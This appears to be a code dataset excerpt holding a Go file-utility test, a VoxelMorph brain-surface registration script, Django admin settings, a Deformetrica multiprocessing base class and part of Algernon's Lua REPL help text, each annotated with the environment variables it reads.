assert.False(t, Exists(tmpfile))
_, err := Touch(tmpfile)
assert.Nil(t, err)
assert.True(t, Exists(tmpfile))
// Truncate and re-create it
_, err = Touch(tmpfile)
assert.Nil(t, err)
}
}
func TestWriteBytes(t *testing.T) {
resetTest()
	// attempt to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteBytes(path.Join(dstDir, "file"), []byte("test"))
assert.True(t, strings.HasPrefix(err.Error(), "failed writing bytes to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteBytes("", []byte("test"))
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
// Read and write file
data, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
err = WriteBytes(tmpfile, data, 0644)
assert.Nil(t, err)
// Test the resulting file
data2, err := ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, data, data2)
}
}
func TestWriteLines(t *testing.T) {
resetTest()
	// attempt to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteLines(path.Join(dstDir, "file"), []string{"test"})
assert.True(t, strings.HasPrefix(err.Error(), "failed writing lines to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteLines("", []string{"test"})
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
lines, err := ReadLines(testfile)
assert.Nil(t, err)
assert.Equal(t, 18, len(lines))
err = WriteLines(tmpfile, lines, 0644)
assert.Nil(t, err)
{
lines2, err := ReadLines(tmpfile)
assert.Nil(t, err)
assert.Equal(t, lines, lines2)
}
}
}
func TestWriteStream(t *testing.T) {
// force close only
{
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
// force sync and close errors
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed syncing stream to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
// force sync and close errors
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed syncing stream to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
	// attempt to read from an iotest TimeoutReader and force a close failure
{
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
testReader := iotest.TimeoutReader(reader)
err = WriteStream(testReader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": failed copying stream data: timeout"))
assert.Nil(t, os.Remove(tmpfile))
}
	// attempt to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteStream(&os.File{}, path.Join(dstDir, "file"))
assert.True(t, strings.HasPrefix(err.Error(), "failed opening file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty destination file
{
err := WriteStream(&os.File{}, "")
assert.Equal(t, "empty string is an invalid path", err.Error())
}
var expectedData []byte
expectedData, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
// No file exists
{
resetTest()
// Read and write file
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile, 0644)
assert.Nil(t, reader.Close())
assert.Nil(t, err)
// Test the resulting file
var data []byte
data, err = ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, expectedData, data)
assert.Nil(t, os.Remove(tmpfile))
}
// Overwrite and truncate file
{
// Read and write file
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.Nil(t, err)
// Test the resulting file
var data []byte
		data, err = ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, expectedData, data)
assert.Nil(t, os.Remove(tmpfile))
}
}
func TestWriteString(t *testing.T) {
resetTest()
	// attempt to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteString(path.Join(dstDir, "file"), "test")
assert.True(t, strings.HasPrefix(err.Error(), "failed writing string to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteString("", "test")
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
// Read and write file
data, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
err = WriteString(tmpfile, string(data), 0644)
assert.Nil(t, err)
// Test the resulting file
data2, err := ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, data, data2)
}
}
| [
"\"HOME\"",
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
scripts/sphere/register.py | #!/usr/bin/env python
"""
Example script to register two volumes with VoxelMorph models.
Please make sure to use trained models appropriately. Let's say we have a model trained to register
a scan (moving) to an atlas (fixed). To register a scan to the atlas and save the warp field, run:
register.py --moving moving.nii.gz --fixed fixed.nii.gz --model model.pt
--moved moved.nii.gz --warp warp.nii.gz
The source and target input images are expected to be affinely registered.
If you use this code, please cite the following, and read function docs for further info/citations
VoxelMorph: A Learning Framework for Deformable Medical Image Registration
G. Balakrishnan, A. Zhao, M. R. Sabuncu, J. Guttag, A.V. Dalca.
IEEE TMI: Transactions on Medical Imaging. 38(8). pp 1788-1800. 2019.
or
Unsupervised Learning for Probabilistic Diffeomorphic Registration for Images and Surfaces
A.V. Dalca, G. Balakrishnan, J. Guttag, M.R. Sabuncu.
MedIA: Medical Image Analysis. (57). pp 226-236, 2019
Copyright 2020 Adrian V. Dalca
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in
compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is
distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions and limitations under
the License.
"""
import os
import argparse
import matplotlib.pyplot as plt
# third party
import numpy as np
import nibabel as nib
import torch
from scipy.interpolate import RegularGridInterpolator
from astropy.coordinates import cartesian_to_spherical, spherical_to_cartesian
# import voxelmorph with sphere backend
os.environ['VXM_BACKEND'] = 'sphere'
import voxelmorph as vxm # nopep8
import math
# parse commandline args
parser = argparse.ArgumentParser()
parser.add_argument('--moving', required=True, help='moving image (source) filename')
parser.add_argument('--fixed', required=True, help='fixed image (target) filename')
parser.add_argument('--moved', help='warped image output filename')
parser.add_argument('--model', required=True, help='pytorch model for nonlinear registration')
# parser.add_argument('--normalize_type', default='std', help='select the data normalization processing type')
parser.add_argument('--warp', help='output warp deformation filename')
parser.add_argument('--sphere_sub', help='sphere_sub image filename')
parser.add_argument('--sphere_atlas', help='sphere_atlas image filename')
parser.add_argument('--sphere_reg', help='sphere.reg image output filename')
parser.add_argument('--sulc_sub', help='sulc_sub image filename')
parser.add_argument('--sulc_atlas', help='sulc_atlas image filename')
parser.add_argument('--sphere_freesurfer', help='sphere_freesurfer image filename')
parser.add_argument('--plot_image', help='show time image output filename')
parser.add_argument('--plot_image_dif_1', help='show dif image output filename')
parser.add_argument('--plot_image_dif_2', help='show dif image output filename')
parser.add_argument('-g', '--gpu', help='GPU number(s) - if not supplied, CPU is used')
parser.add_argument('--multichannel', action='store_true',
help='specify that data has multiple channels')
args = parser.parse_args()
def meannormalize(sub_data):
mean = np.mean(sub_data)
std = np.std(sub_data)
norm = (sub_data - mean) / std
return norm, mean, std
def backmeannormalize(input, mean, std):
output = input * std + mean
return output
def minmaxnormalize(sub_data):
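    """Scale sub_data to [0, 1] while keeping exact zeros (background) at zero."""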
zeros = sub_data == 0
max = np.max(sub_data)
min = np.min(sub_data)
norm = (sub_data - min) / (max - min)
norm[zeros] = 0
return norm
def backminmaxnormalize(input, max, min):
output = input * (max - min) + min
return output
def domainnorm(sub_data):
domain = 33
norm = sub_data / domain
return norm
def backdomainnorm(sub_data):
domain = 33
output = sub_data * domain
return output
# def normalize_forword(data, type="std"):
# if type == "std":
# return meannormalize(data)
# elif type == "min_max":
# return minmaxnormalize(data)
# else:
# raise KeyError("type is error")
#
# def normalize_backword(data, a, b, type="std"):
# if type == "std":
# return backmeannormalize(data, a, b)
# elif type == "min_max":
# return backminmaxnormalize(data, a, b)
# else:
# raise KeyError("type is error")
def interpolate(warp_file, lh_sphere):
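    """Resample the predicted 2-D warp field at each vertex of a FreeSurfer sphere.

    warp_file is expected to be the displacement tensor predicted by the model,
    interpreted on a 256 x 512 (phi x theta) grid, and lh_sphere a FreeSurfer
    sphere surface file. Returns the vertex radii together with the warped
    (phi, theta) coordinates in radians.
    """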
x = np.linspace(-128, 128, 256) # phi ###
y = np.linspace(0, 512, 512) # theta ###
# print(warp_file.files)
warp = warp_file.squeeze()
warp = warp.permute(0, 2, 1)
warp = warp.detach().numpy()
# warp = warp_file['vol']
# warp = np.moveaxis(warp, 1, -1)
interpolate_function_x = RegularGridInterpolator((x, y), -warp[0]) # x-axis
interpolate_function_y = RegularGridInterpolator((x, y), -warp[1]) # y-axis
coords, faces = nib.freesurfer.read_geometry(lh_sphere)
r, phi, theta = cartesian_to_spherical(coords[:, 0], coords[:, 1], coords[:, 2])
p = phi.degree
t = theta.degree
theta_bins = 512
phi_bins = 256
theta_width = math.degrees(2 * np.pi) / theta_bins
t /= theta_width
phi_width = math.degrees(np.pi) / phi_bins
p /= phi_width
t = t.reshape(-1, 1)
p = p.reshape(-1, 1)
pts = np.concatenate((p, t), axis=1)
new_pts_x = interpolate_function_x(pts)
new_pts_y = interpolate_function_y(pts)
x_prime = pts.T[0] + new_pts_x
y_prime = pts.T[1] + new_pts_y
x_prime *= phi_width
y_prime *= theta_width
y_prime = np.clip(y_prime, 0, 360)
x_prime = np.clip(x_prime, -90, 90)
t_prime = [math.radians(i) for i in y_prime]
p_prime = [math.radians(i) for i in x_prime]
t_prime = np.array(t_prime)
p_prime = np.array(p_prime)
return r, p_prime, t_prime
# save 4 image
def save4image(lh_sphere_sub, lh_sphere_atlas, lh_sulc_sub, lh_sulc_atlas, lh_sphere_freesurfer, phi_prime, theta_prime,
imagesavefilename):
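    """Plot sulc maps for the moving, fixed, moved and FreeSurfer-registered spheres.

    The moving, moved and FreeSurfer panels are coloured with the subject's sulc
    values and the fixed panel with the atlas sulc values; phi_prime and
    theta_prime are assumed to be the warped vertex coordinates in radians, as
    returned by interpolate(). The four-panel figure is saved to imagesavefilename.
    """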
lh_morph_sulc_sub = nib.freesurfer.read_morph_data(lh_sulc_sub)
lh_morph_sulc_atlas = nib.freesurfer.read_morph_data(lh_sulc_atlas)
coords_sub, faces_sub = nib.freesurfer.read_geometry(lh_sphere_sub)
r_sub, phi_sub, theta_sub = cartesian_to_spherical(coords_sub[:, 0], coords_sub[:, 1], coords_sub[:, 2])
coords_atlas, faces_atlas = nib.freesurfer.read_geometry(lh_sphere_atlas)
r_atlas, phi_atlas, theta_atlas = cartesian_to_spherical(coords_atlas[:, 0], coords_atlas[:, 1], coords_atlas[:, 2])
coords_freesurfer, faces_freesurfer = nib.freesurfer.read_geometry(lh_sphere_freesurfer)
r_reg, phi_reg, theta_reg = cartesian_to_spherical(coords_freesurfer[:, 0], coords_freesurfer[:, 1],
coords_freesurfer[:, 2])
fig = plt.figure(figsize=(14, 7))
ax = fig.add_subplot(141)
ax.scatter(phi_sub.degree, theta_sub.degree, s=0.1,
c=lh_morph_sulc_sub) # phi.degree: [-90, 90], theta.degree: [0, 360]
plt.title('Moving')
ax = fig.add_subplot(142)
ax.scatter(phi_atlas.degree, theta_atlas.degree, s=0.1, c=lh_morph_sulc_atlas)
plt.title('Fixed')
ax = fig.add_subplot(143)
    phi_prime_deg = [math.degrees(p) for p in phi_prime]
    theta_prime_deg = [math.degrees(t) for t in theta_prime]
    ax.scatter(phi_prime_deg, theta_prime_deg, s=0.1, c=lh_morph_sulc_sub)  # (256, 512)
plt.title('Moved')
ax = fig.add_subplot(144)
ax.scatter(phi_reg.degree, theta_reg.degree, s=0.1, c=lh_morph_sulc_sub) # (256, 512)
plt.title('Moved FreeSurfer')
plt.savefig(imagesavefilename)
def xyz2degree(lh_sphere, lh_sulc):
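    """Rasterise a sphere's sulc values onto a 512 x 256 (theta x phi) grid.

    Vertex coordinates from lh_sphere are converted to degrees, binned into the
    grid, and filled with the sulc values from lh_sulc (the last vertex mapped
    to a bin wins).
    """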
# coords: return (x, y, z) coordinates
# faces: defining mesh triangles
coords, faces = nib.freesurfer.read_geometry(lh_sphere)
# (r: radius, phi: latitude, theta: longitude) in radians
r, phi, theta = cartesian_to_spherical(coords[:, 0], coords[:, 1], coords[:, 2])
lat = phi.degree + 90
lon = theta.degree
# resize to (512, 256)
y_bins = 512
x_bins = 256
y_width = math.degrees(2 * np.pi) / y_bins
ys = lon // y_width
x_width = math.degrees(np.pi) / x_bins
xs = lat // x_width
ys = np.clip(ys, 0, 511)
xs = np.clip(xs, 0, 255)
# load curv and sulc info
lh_morph_sulc = nib.freesurfer.read_morph_data(lh_sulc)
xs = xs.astype(np.int32)
ys = ys.astype(np.int32)
# values store [theta, phi, sulc value, curv value]
values = np.zeros((512, 256))
values[ys, xs] = lh_morph_sulc
# values[1, ys, xs] = lh_morph_curv
return values
def xyz2degree2(phi, theta, lh_sulc):
lat = phi + 90
lon = theta
# resize to (512, 256)
y_bins = 512
x_bins = 256
y_width = math.degrees(2 * np.pi) / y_bins
ys = lon // y_width
x_width = math.degrees(np.pi) / x_bins
xs = lat // x_width
ys = np.clip(ys, 0, 511)
xs = np.clip(xs, 0, 255)
# load curv and sulc info
lh_morph_sulc = nib.freesurfer.read_morph_data(lh_sulc)
xs = xs.astype(np.int32)
ys = ys.astype(np.int32)
# values store [theta, phi, sulc value, curv value]
values = np.zeros((512, 256))
values[ys, xs] = lh_morph_sulc
# values[1, ys, xs] = lh_morph_curv
return values
# device handling
if args.gpu and (args.gpu != '-1'):
device = 'cuda'
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
else:
device = 'cpu'
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
# load moving and fixed images
add_feat_axis = not args.multichannel
moving = vxm.py.utils.load_volfile(args.moving, add_batch_axis=True, add_feat_axis=add_feat_axis)
fixed, fixed_affine = vxm.py.utils.load_volfile(
args.fixed, add_batch_axis=True, add_feat_axis=add_feat_axis, ret_affine=True)
# load and set up model
model = vxm.networks.VxmDense.load(args.model, device)
model.to(device)
model.eval()
# set up normalize type
# normalize_type = args.normalize_type
# normalize_type = "min_max"
# set up tensors and permute
# moving, a_moving, b_moving = normalize_forword(moving, type=normalize_type)
# fixed, a_fixed, b_fixed = normalize_forword(fixed, type=normalize_type)
# moving = domainnorm(moving)
moving = minmaxnormalize(moving)
fixed = minmaxnormalize(fixed)
input_moving = torch.from_numpy(moving).to(device).float().permute(0, 3, 1, 2)
input_fixed = torch.from_numpy(fixed).to(device).float().permute(0, 3, 1, 2)
# predict
moved, warp = model(input_moving, input_fixed, registration=True)
# moved = normalize_backword(moved, a_moving, b_moving, type=normalize_type)
# moved = backdomainnorm(moved)
if args.sphere_sub:
c, faces = nib.freesurfer.read_geometry(args.sphere_sub)
coords = np.empty(shape=c.shape)
r, phi_prime, theta_prime = interpolate(warp, args.sphere_sub)
coords[:, 0], coords[:, 1], coords[:, 2] = spherical_to_cartesian(r, phi_prime, theta_prime)
nib.freesurfer.io.write_geometry(args.sphere_reg, coords, faces)
if args.plot_image:
lh_sphere_sub = args.sphere_sub
lh_sphere_atlas = args.sphere_atlas
lh_sulc_sub = args.sulc_sub
lh_sulc_atlas = args.sulc_atlas
lh_sphere_freesurfer = args.sphere_freesurfer
imagesavefilename = args.plot_image
save4image(lh_sphere_sub, lh_sphere_atlas, lh_sulc_sub, lh_sulc_atlas, lh_sphere_freesurfer, phi_prime, theta_prime,
imagesavefilename)
if args.plot_image_dif_1 or args.plot_image_dif_2:
imagesavefilenamedif_1 = args.plot_image_dif_1
imagesavefilenamedif_2 = args.plot_image_dif_2
    dif_moving = xyz2degree(args.sphere_sub, args.sulc_sub)
    dif_moved = xyz2degree2(phi_prime, theta_prime, args.sulc_sub)
    dif_freesurfer = xyz2degree(args.sphere_freesurfer, args.sulc_sub)
dif_moved_moving = dif_moved - dif_moving
print(np.nanmax(dif_moved_moving), np.nanmin(dif_moved_moving), np.nanmean(dif_moved_moving))
dif_freesurfer_moved = dif_freesurfer - dif_moved
plt.figure(figsize=(14, 7))
plt.imshow(dif_moved_moving)
plt.title('moved_moving')
plt.colorbar()
plt.savefig(imagesavefilenamedif_1)
plt.figure(figsize=(14, 7))
plt.imshow(dif_freesurfer_moved)
plt.title('freesurfer_moved')
plt.colorbar()
plt.savefig(imagesavefilenamedif_2)
# save moved image
if args.moved:
moved = moved.detach().cpu().numpy().squeeze()
vxm.py.utils.save_volfile(moved, args.moved, fixed_affine)
# save warp
if args.warp:
warp = warp.detach().cpu().numpy().squeeze()
vxm.py.utils.save_volfile(warp, args.warp, fixed_affine)
| []
| []
| [
"CUDA_VISIBLE_DEVICES",
"VXM_BACKEND"
]
| [] | ["CUDA_VISIBLE_DEVICES", "VXM_BACKEND"] | python | 2 | 0 | |
stackable/contrib/config/conf_admin.py | '''
Created on Oct 27, 2013
@author: patrick
'''
import os
from stackable.stackable import EnvSettingsBase
from .conf_fullhttps import Config_SiteHttps
class EnvSettings_admin(Config_SiteHttps):
"""
PRODUCTION SITE SETTINGS.
TO PROTECT ALL PATHS WITH HTTPS:
* SESSION_COOKIE_SECURE = True
* CSRF_COOKIE_SECURE = True
* SECURE_REQUIRED_PATHS = ('*',)
TO PROTECT ONLY SPECIFIC PATHS:
* SESSION_COOKIE_SECURE = False
* CSRF_COOKIE_SECURE = False
* SECURE_REQUIRED_PATHS = ('/uri/path', '/uri/path',)
"""
DEBUG = False
ENABLE_ADMIN = True
_apps_additions_ = ('django.contrib.admin',)
EnvSettingsBase.patch_apps(_apps_additions_,
after='django.contrib.sitemaps')
# HTTPS
# see http://security.stackexchange.com/questions/8964/trying-to-make-a-django-based-site-use-https-only-not-sure-if-its-secure
# SESSION_COOKIE_SECURE=True
# CSRF_COOKIE_SECURE=True
SECURE_REQUIRED_PATHS = ('/accounts/', '/profile/', '/admin/', )
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# make sure we get the secret key from outside so it only lives in memory
# never on disk
SECRET_KEY = os.environ.get('DJANGO_PROB_SEED', "")
# haystack
ES_INDEX_NAME = "haystack"
| []
| []
| [
"DJANGO_PROB_SEED"
]
| [] | ["DJANGO_PROB_SEED"] | python | 1 | 0 | |
deformetrica/core/models/abstract_statistical_model.py | import logging
import os
import time
import torch
from abc import abstractmethod
import torch.multiprocessing as mp
from ...core import default
logger = logging.getLogger(__name__)
# used as a global variable when processes are initially started.
process_initial_data = None
def _initializer(*args):
"""
Process initializer function that is called when mp.Pool is started.
:param args: arguments that are to be copied to the target process. This can be a tuple for convenience.
"""
global process_initial_data
process_id, process_initial_data = args
assert 'OMP_NUM_THREADS' in os.environ
torch.set_num_threads(int(os.environ['OMP_NUM_THREADS']))
# manually set process name
with process_id.get_lock():
mp.current_process().name = 'PoolWorker-' + str(process_id.value)
logger.info('pid=' + str(os.getpid()) + ' : ' + mp.current_process().name)
process_id.value += 1
class AbstractStatisticalModel:
"""
AbstractStatisticalModel object class.
A statistical model is a generative function, which tries to explain an observed stochastic process.
"""
####################################################################################################################
### Constructor:
####################################################################################################################
def __init__(self, name='undefined', number_of_processes=default.number_of_processes, gpu_mode=default.gpu_mode):
self.name = name
self.fixed_effects = {}
self.priors = {}
self.population_random_effects = {}
self.individual_random_effects = {}
self.has_maximization_procedure = None
self.number_of_processes = number_of_processes
self.gpu_mode = gpu_mode
self.pool = None
@abstractmethod
def get_fixed_effects(self):
raise NotImplementedError
@abstractmethod
def setup_multiprocess_pool(self, dataset):
raise NotImplementedError
def _setup_multiprocess_pool(self, initargs=()):
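        """Start a worker pool when more than one process is requested.

        initargs is forwarded, together with a shared process counter, to the
        module-level _initializer above, so each worker receives a copy of the
        initial data and a stable 'PoolWorker-<n>' name.
        """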
if self.number_of_processes > 1:
logger.info('Starting multiprocess using ' + str(self.number_of_processes) + ' processes')
assert len(mp.active_children()) == 0, 'This should not happen. Has the cleanup() method been called ?'
start = time.perf_counter()
process_id = mp.Value('i', 0, lock=True) # shared between processes
initargs = (process_id, initargs)
self.pool = mp.Pool(processes=self.number_of_processes, maxtasksperchild=None,
initializer=_initializer, initargs=initargs)
            logger.info('Multiprocess pool started using sharing strategy "' + mp.get_sharing_strategy() + '"' +
' in: ' + str(time.perf_counter()-start) + ' seconds')
if torch.cuda.is_available() and self.number_of_processes > torch.cuda.device_count():
logger.warning("You are trying to run more processes than there are available GPUs, "
"it is advised to run `nvidia-cuda-mps-control` to leverage concurrent cuda executions. "
"If run in background mode, don't forget to stop the daemon when done.")
def _cleanup_multiprocess_pool(self):
if self.pool is not None:
self.pool.terminate()
####################################################################################################################
### Common methods, not necessarily useful for every model.
####################################################################################################################
def cleanup(self):
self._cleanup_multiprocess_pool()
def clear_memory(self):
pass
| []
| []
| [
"OMP_NUM_THREADS"
]
| [] | ["OMP_NUM_THREADS"] | python | 1 | 0 | |
engine/repl.go | package engine
import (
"bytes"
"fmt"
"io"
"os"
"path/filepath"
"runtime"
"strings"
"github.com/chzyer/readline"
"github.com/mitchellh/go-homedir"
log "github.com/sirupsen/logrus"
"github.com/xyproto/algernon/lua/codelib"
"github.com/xyproto/algernon/lua/convert"
"github.com/xyproto/algernon/lua/datastruct"
"github.com/xyproto/algernon/lua/jnode"
"github.com/xyproto/algernon/lua/pure"
"github.com/xyproto/ask"
"github.com/xyproto/gopher-lua"
"github.com/xyproto/textoutput"
)
const (
generalHelpText = `Available functions:
Data structures
// Get or create database-backed Set (takes a name, returns a set object)
Set(string) -> userdata
// Add an element to the set
set:add(string)
// Remove an element from the set
set:del(string)
// Check if a set contains a value.
// Returns true only if the value exists and there were no errors.
set:has(string) -> bool
// Get all members of the set
set:getall() -> table
// Remove the set itself. Returns true if successful.
set:remove() -> bool
// Clear the set. Returns true if successful.
set:clear() -> bool
// Get or create a database-backed List (takes a name, returns a list object)
List(string) -> userdata
// Add an element to the list
list:add(string)
// Get all members of the list
list:getall() -> table
// Get the last element of the list. The returned value can be empty
list:getlast() -> string
// Get the N last elements of the list
list:getlastn(number) -> table
// Remove the list itself. Returns true if successful.
list:remove() -> bool
// Clear the list. Returns true if successful.
list:clear() -> bool
// Return all list elements (expected to be JSON strings) as a JSON list
list:json() -> string
// Get or create a database-backed HashMap
// (takes a name, returns a hash map object)
HashMap(string) -> userdata
// For a given element id (for instance a user id), set a key.
// Returns true if successful.
hash:set(string, string, string) -> bool
// For a given element id (for instance a user id), and a key, return a value.
hash:get(string, string) -> string
// For a given element id (for instance a user id), and a key,
// check if the key exists in the hash map.
hash:has(string, string) -> bool
// For a given element id (for instance a user id), check if it exists.
hash:exists(string) -> bool
// Get all keys of the hash map
hash:getall() -> table
// Remove a key for an entry in a hash map. Returns true if successful
hash:delkey(string, string) -> bool
// Remove an element (for instance a user). Returns true if successful
hash:del(string) -> bool
// Remove the hash map itself. Returns true if successful.
hash:remove() -> bool
// Clear the hash map. Returns true if successful.
hash:clear() -> bool
// Get or create a database-backed KeyValue collection
// (takes a name, returns a key/value object)
KeyValue(string) -> userdata
// Set a key and value. Returns true if successful.
kv:set(string, string) -> bool
// Takes a key, returns a value. May return an empty string.
kv:get(string) -> string
// Takes a key, returns the value+1.
// Creates a key/value and returns "1" if it did not already exist.
kv:inc(string) -> string
// Remove a key. Returns true if successful.
kv:del(string) -> bool
// Remove the KeyValue itself. Returns true if successful.
kv:remove() -> bool
// Clear the KeyValue. Returns true if successful.
kv:clear() -> bool
Live server configuration
// Reset the URL prefixes and make everything *public*.
ClearPermissions()
// Add an URL prefix that will have *admin* rights.
AddAdminPrefix(string)
// Add an URL prefix that will have *user* rights.
AddUserPrefix(string)
// Provide a lua function that will be used as the permission denied handler.
DenyHandler(function)
// Direct the logging to the given filename. If the filename is an empty
// string, direct logging to stderr. Returns true if successful.
LogTo(string) -> bool
Output
// Log the given strings as info. Takes a variable number of strings.
log(...)
// Log the given strings as a warning. Takes a variable number of strings.
warn(...)
// Log the given strings as an error. Takes a variable number of strings.
err(...)
// Output text. Takes a variable number of strings.
print(...)
// Output rendered HTML given Markdown. Takes a variable number of strings.
mprint(...)
// Output rendered HTML given Amber. Takes a variable number of strings.
aprint(...)
// Output rendered CSS given GCSS. Takes a variable number of strings.
gprint(...)
// Output rendered JavaScript given JSX for HyperApp. Takes a variable number of strings.
hprint(...)
// Output rendered JavaScript given JSX for React. Takes a variable number of strings.
jprint(...)
// Output a Pongo2 template and key/value table as rendered HTML. Use "{{ key }}" to insert a key.
poprint(string[, table])
// Output a simple HTML page with a message, title and theme.
msgpage(string[, string][, string])
Cache
CacheInfo() -> string // Return information about the file cache.
ClearCache() // Clear the file cache.
preload(string) -> bool // Load a file into the cache, returns true on success.
JSON
// Use, or create, a JSON document/file.
JFile(filename) -> userdata
// Retrieve a string, given a valid JSON path. May return an empty string.
jfile:getstring(string) -> string
// Retrieve a JSON node, given a valid JSON path. May return nil.
jfile:getnode(string) -> userdata
// Retrieve a value, given a valid JSON path. May return nil.
jfile:get(string) -> value
// Change an entry given a JSON path and a value. Returns true if successful.
jfile:set(string, string) -> bool
// Given a JSON path (optional) and JSON data, add it to a JSON list.
// Returns true if successful.
jfile:add([string, ]string) -> bool
// Removes a key in a map in a JSON document. Returns true if successful.
jfile:delkey(string) -> bool
// Convert a Lua table with strings or ints to JSON.
// Takes an optional number of spaces to indent the JSON data.
json(table[, number]) -> string
// Create a JSON document node.
JNode() -> userdata
// Add JSON data to a node. The first argument is an optional JSON path.
// The second argument is a JSON data string. Returns true on success.
// "x" is the default JSON path.
jnode:add([string, ]string) -> bool
// Given a JSON path, retrieves a JSON node.
jnode:get(string) -> userdata
// Given a JSON path, retrieves a JSON string.
jnode:getstring(string) -> string
// Given a JSON path and a JSON string, set the value.
jnode:set(string, string)
// Given a JSON path, remove a key from a map.
jnode:delkey(string) -> bool
// Return the JSON data, nicely formatted.
jnode:pretty() -> string
// Return the JSON data, as a compact string.
jnode:compact() -> string
// Sends JSON data to the given URL. Returns the HTTP status code as a string.
// The content type is set to "application/json;charset=utf-8".
// The second argument is an optional authentication token that is used for the
// Authorization header field. Uses HTTP POST.
jnode:POST(string[, string]) -> string
// Sends JSON data to the given URL. Returns the HTTP status code as a string.
// The content type is set to "application/json;charset=utf-8".
// The second argument is an optional authentication token that is used for the
// Authorization header field. Uses HTTP PUT.
jnode:PUT(string[, string]) -> string
// Alias for jnode:POST
jnode:send(string[, string]) -> string
// Fetches JSON over HTTP given an URL that starts with http or https.
// The JSON data is placed in the JNode. Returns the HTTP status code as a string.
jnode:GET(string) -> string
// Alias for jnode:GET
jnode:receive(string) -> string
// Convert from a simple Lua table to a JSON string
JSON(table) -> string
HTTP Requests
// Create a new HTTP Client object
HTTPClient() -> userdata
// Select Accept-Language (ie. "en-us")
hc:SetLanguage(string)
// Set the request timeout (in milliseconds)
hc:SetTimeout(number)
// Set a cookie (name and value)
hc:SetCookie(string, string)
// Set the user agent (ie. "curl")
hc:SetUserAgent(string)
// Perform a HTTP GET request. First comes the URL, then an optional table with
// URL parameters, then an optional table with HTTP headers.
hc:Get(string, [table], [table]) -> string
// Perform a HTTP POST request. It takes the same arguments as hc:Get, except that
// the fourth optional argument is the POST body.
hc:Post(string, [table], [table], [string]) -> string
// Like hc:Get, except the first argument is the HTTP method (like "PUT")
hc:Do(string, string, [table], [table]) -> string
// Shorthand for HTTPClient():Get(). Retrieve an URL, with optional tables for
// URL parameters and HTTP headers.
GET(string, [table], [table]) -> string
// Shorthand for HTTPClient():Post(). Post to an URL, with optional tables for
// URL parameters and HTTP headers, followed by a string for the body.
POST(string, [table], [table], [string]) -> string
// Shorthand for HTTPClient():Do(). Like Get, but the first argument is the
// method, like ie. "PUT".
DO(string, string, [table], [table]) -> string
Plugins
// Load a plugin given the path to an executable. Returns true if successful.
// Will return the plugin help text if called on the Lua prompt.
Plugin(string) -> bool
// Returns the Lua code as returned by the Lua.Code function in the plugin,
// given a plugin path. May return an empty string.
PluginCode(string) -> string
// Takes a plugin path, function name and arguments. Returns an empty string
// if the function call fails, or the results as a JSON string if successful.
